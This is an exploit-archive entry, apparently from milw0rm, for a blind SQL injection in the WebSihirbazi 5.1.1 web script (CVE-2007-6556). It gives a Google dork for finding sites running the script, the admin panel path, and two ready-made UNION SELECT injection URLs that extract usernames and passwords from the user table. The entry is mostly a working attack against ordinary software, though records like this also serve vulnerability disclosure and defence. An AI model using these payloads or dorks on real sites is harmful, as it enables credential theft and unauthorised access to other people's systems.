WebSihirbazi 5.1.1 - 'pageid' SQL Injection

Author: bypass
type: webapps
platform: php
port: 
date_added: 2007-12-23  
date_updated:   
verified: 1  
codes: OSVDB-39640;CVE-2007-6556  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 4777.txt  
_________________________________________________________________________________
 ||----------------------------------------------------------------------
 |# Title : websihirbazi v5.1.1 Remote Blind SQL Injection Vulnerability|
 ||----------------------------------------------------------------------
 |# AUTHOR: bypas |
 ||----------------------------------------------------------------------
 |# script name : websihirbazi v5.1.1  | 200$ |
 ||----------------------------------------------------------------------
 |# scritp web page : http://www.sitehazirla.org |
 ||----------------------------------------------------------------------
 |# script admin panel : http://victim/script_path/yonetim |
 ||----------------------------------------------------------------------
 |# Google dork : |Powered By WebSihirbazı
 ||----------------------------------------------------------------------
 |# Message Tr : Hayat İllegal - / - bir daha taklit iş yapmayın emege saygılı olun |
 ||----------------------------------------------------------------------
_________________________________________________________________________________

< / ----------------------------------------------------------------------------- />


< / ------   Example sql bug  :   ------ / >


http://[target]/[script_path]/default.asp?page=news&id=-2+union+all+select+0,kullaniciadi,sifre,3+from+user


http://[target]/[script_path]/default.asp?pageid=-7+union+all+select+0,1,2,kullaniciadi,sifre,5+from+user


< / ----------------------------------------------------------------------------- />

# milw0rm.com [2007-12-24]